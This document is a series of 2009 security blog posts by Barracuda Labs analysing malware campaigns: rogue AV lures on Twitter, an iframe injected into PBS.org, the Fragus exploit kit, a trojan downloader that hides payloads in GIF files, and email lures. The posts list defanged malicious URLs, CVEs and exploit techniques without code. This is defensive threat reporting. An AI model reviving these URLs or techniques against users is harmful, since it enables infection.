The Barracuda Labs Internet Security Blog

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches that use some of the above topics lead to these tweets, as shown in the following examples:

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3
c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.bps.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.“

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.

Posted by: Barracuda Labs

Recently, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious URLs backed by what was found to be Fragus, a new exploit kit that appeared in late July 2009. An example of a Fragus URL and a screenshot of its admin control panel login page are shown directly below.

hxxp://blt.kz/1/show.php?s=5015ba5606

Fragus Admin Control Panel Login

As with most modern exploit kits, Fragus serves not one, but a grab bag of exploits that attack the browser, ActiveX controls, and third party plugins. Deobfuscating the javascript served off of the above URL revealed the following function names (bodies omitted), which each attempt to exploit one or more different vulnerabilities:

directshow(): Performs heap spraying, then serves hxxp://blt.kz/1/directshow.php, which targets the Microsoft Video (DirectShow) ActiveX control vulnerability (a.k.a., MS09-032).

pdf(): Serves hxxp://blt.kz/1/pdf.php?eid=3, which targets Acrobat Reader vulnerabilities in util.printf, Collab.getIcon, and Collab.collectEmailInfo (a.k.a., CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659, respectively).

flash(): Serves hxxp://blt.kz/1/swf.php?eid=4, which targets the Adobe Flash Player integer overflow vulnerability (a.k.a., CVE-2007-0071).

aolwinamp(): Performs heap spraying, then attempts to exploit the AOL Radio AmpX (AOLMediaPlaybackControl) ActiveX control vulnerability (a.k.a., CVE-2007-6250).

snapshot(): Targets the Microsoft Access Snapshot Viewer ActiveX control vulnerability (a.k.a., MS08-041) in an attempt to have hxxp://blt.kz/1/load.php?e=6 executed.

spreadsheet(): Performs heap spraying, then attempts to exploit the Microsoft Office Web Components ActiveX control vulnerability (a.k.a., MS09-043).

ms09002(): Performs heap spraying, then attempts to exploit the Microsoft Internet Explorer 7 memory corruption vulnerability (a.k.a., MS09-002).

The above set of exploits motivates mention of two observations about the continuing evolution of the web threat landscape. First, given that Fragus targets vulnerabilities in at least seven different software components, viewing a given vulnerability as being more or less exploited than another is increasingly incompatible with the way in which it is used. Modern exploit kits will target any and all vulnerabilities that have a reasonable chance of successfully compromising a system, and unfortunately, the presence of just one vulnerable, out-of-date software component is required for that compromise to occur. Second, as one of the above vulnerabilities (MS09-043) is less than a month old, the length of time between the discovery of a vulnerability and its widespread use by criminals is shrinking. The creators of malware infrastructure are now rapidly integrating recently-discovered vulnerabilities into do-it-yourself exploit kits, and security companies must be increasingly quick to respond.

Users of the PWSS are protected from this threat.

Posted by: Barracuda Labs

Earlier today, malicious links that claimed to offer videos and pictures of Erin Andrews began appearing on Twitter. Search terms leading to these malicious tweets include the following:

erin andrews peephole video link rapidshare
espn reporter erin andrews
erin andrews peephole pictures
erin andrews video torrent
erin andrews hot pics

The malicious tweets were (automatically) created using numerous accounts and the Twitter API; the links have been shortened using bit.ly, as shown in the following screenshot.

If the the user clicks on one of the links, the following series of redirections occur:

hxxp://bit.ly/1bkUV9
-> hxxp://xombag.com/video/go.php?sid=2&name=erin+andrews+hot+pics&theme
=trends&hostingtype=twitter

-> hxxp://sunny-tube-world.com/xplays.php?id=40014&name=erin+andrews+hot+pics&the
me=trends&hostingtype=twitter

The name parameter in the above URLs corresponds to the text of the tweet that started the chain, which allows the operators of the propagation campaign to determine which combinations of terms (listed at the beginning of this post) made the best lures. The series of redirects ends at the page shown in the screenshot below, which offers a fake video that the user will likely assume is of Erin Andrews.

The fake video, served via hxxp://newfileexe.com/onlinemovies.40014.exe, is a trojan downloader– a small piece of malware that (when executed) will download and execute other malicious programs. AV detections for this instance are practically non-existent:

http://www.virustotal.com/analisis/f9e4218db68f661751ffe2ced790ebf30e55e8bb7
a39fc46e47831453d214e8f-1248216878

One of the most fascinating parts of this campaign is how the trojan downloader retrieves additional malware. Instead of downloading executables, the downloader fetches the following image files:

hxxp://isyouimageshere.com/item/b6bc3e14a0639460413e87d5c4d82e8267c6a66
1217f2f1530b599dd6f76ee1d23103cd88fd83fc10/b4a0d091c46/titem.gif

hxxp://imgesinstudioonline.com/perce/861c5e6420337400215e97e5c4d81e42b74

62631f1af8f65702579fdbff64e4d03a0ac38ef284f117/d40040b1148/qwerce.gif

hxxp://yourimagesstudio.com/werber/d4300051f41/217.gif

Hidden inside these viewable GIF files (as comment blocks) are encrypted malware executables. After retrieving the files, the downloader extracts the comments, transforms them back into malware, and executes them.

Users of the PWSS are protected from this threat.

Posted by: Barracuda Labs

With the release of Windows 7 only months away, it is worthwhile to begin considering its expected impact on security. This post reasons about a few of the changes the new operating system’s (eventual) widespread adoption will bring.

Application vulnerabilities will be harder to weaponize into working exploits. While Windows memory protections such as DEP and ASLR have been around for several years, ubiquitous applications (IE8, Firefox 3) and their corresponding plugins (Flash, Acrobat Reader, and QuickTime) are now using them. When these protections are combined with recent fixes by Microsoft that address the few corner cases in which they were disabled, the result is that often, even if a vulnerability exists, successfully exploiting it may not be possible. As an example, the Firefox 3.5 just-in-time compiler vulnerability has been reported to not to work under Windows Vista or Windows 7. In the long term, the adoption of these technologies may cause criminals to shift their focus from attacks that are technical in nature (i.e., attacking the browser or its plugins) to those that are social in nature (as used by Rogue AV).

Hardware-assisted rootkits such as Blue Pill will be difficult to deploy. Rootkits that use hardware virtualization operate outside of the host operating system by first assuming a special privilege level, called VMX root mode. Given that Windows 7 implements Windows XP Mode (XPM) using hardware virtualization extensions (and therefore runs in VMX root mode), hardware-assisted rootkit installation becomes considerably more complex. Such a rootkit would need to overcome significant technical hurdles to avoid crashing the OS or alerting the user, which include bypassing OS protection mechanisms, saving XPM guest state, cleanly disabling VMX root mode in the host, and providing emulation services so that XPM applications will continue functioning.

Malware will face significant challenges in evading modern forms of dynamic analysis. Next-generation malware analysis approaches (e.g., Ether) introspect the behavior of malicious software through the use of hardware virtualization extensions. As it is very difficult to reliably detect the presence of an external malware analyzer that resides inside a such hypervisor, some criminals have instead responded by creating malware that refuses to run if it detects the presence of hardware-assisted virtualization. However, given Windows 7’s use of hardware-assisted virtualization in the implementation of XPM, malware that employs this crude form of detection will preclude itself from the very end users it intended to target.

In summary, the release of Windows 7 looks to be an all-around win for security; its adoption will benefit both end users and security professionals.

Posted by: Barracuda Labs

After months of inactivity, Waledac has begun a new propagation email campaign. Messages in this run all relate to the July 4th holiday; an example is shown below.

From: Elmer Curry < tonya.galati@nextiraone.fr >
Date: Sat, 4 Jul 2009 04:37:49
Subject: Happy Birthday, America!
To: < redacted >@orange.fr

Well done 4th! hxxp://axkgi.fireworksnetwork.com/

Similar to Storm’s 2008 July 4th email campaign, clicking on the above link will take the user to a fake YouTube page claiming to offer a video of an expensive fireworks display:

The “video” is actually Waledac malware, which will infect the user’s system if they attempt to “view” it. AV detections for these instances are poor:

http://www.virustotal.com/analisis/7e288c3f5a0d3adee8b50d249fb3a65
6e0ca3736437a16abf4abbbf54af73931-1246683971

Users of the PWSS are protected from this campaign.

Posted by: Barracuda labs

While perusing my spam folder today, I came across the following run-of-the-mill pharmacy email:

From: Hilda McIntyre < hmcintyre_qm@evd.nl >
Date: Tue, Jun 30, 2009 at 8:20 AM
Subject: Unbeatable Pharmacy Offers!
To: < redacted >@gmail.com

An Incredible Canadian Pharmacy is available at your Fingertips!
*No~Doctor~Needed*! Browse our Site Today! -> hxxp://skincarry.com

skincarry.com currently resolves to IPs (e.g., 61.191.191.241) that map back to hundreds of other domains (e.g., *.fnueukej.cn, *.fbaiuaao.cn) hosting the same fake Canadian pharmacy website; the domains exist in part to help spammers get their solicitations past email filters. Not surprisingly, no part of the order process on this site uses SSL (so credit card information, etc. is sent from the browser as unencrypted plain text). However, the wholly fraudulent nature of the site and the operators behind it is not what I wanted to talk about today.

At the top of the site is a picture of fireworks, with text underneath that offers preemptive congratulations on the upcoming July 4th holiday.

July 4th Banner

While above banner is a slightly boring twist on an all-too-familiar social engineering tactic, its presence should serve as a warning. For the past several years, most major holidays in the United States have been accompanied by waves of malicious email that leverage a given event’s popularity to compromise the systems of unsuspecting users. Independence Day is no exception: past uses have included campaigns by botnets as ubiquitous as Storm. Users should be especially diligent when handling holiday-related emails this weekend, as invariably, some will receive messages whose sole purpose is to place malware on their computer.

Posted by: Barracuda Labs

As Twitter’s popularity continues to increase, so does use of its name as a way to spread malware. Late last week a Purewire employee received the following email, which presented itself as an invitation to join Twitter.

From: invitations@twitter.com [mailto:invitations@twitter.com]
Sent: Friday, June 12, 2009 1:05 PM
To: < redacted >@purewire.com
Subject: Your friend invited you to twitter!

…

Your friend invited you to twitter!

Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick, frequent answers to one simple question: What are you doing?

To join or to see who invited you, check the attachment.

---

The attachment accompanying the email–Invitation Card.zip–contained a file named “document.doc     (many spaces)     .exe”. Even if the user’s system was configured to show extensions for known file types, the file (after being extracted from the archive) would still have the following deceptive appearance:

Invitation Card

As with previous campaigns of this nature, if the user attempts to “view” the “invitation card”, they will infect their system with malware. To avoid becoming victims of these multi-facted social engineering attacks, users should be especially diligent when handling attachments claiming to be ecards, invoices, invitations, etc.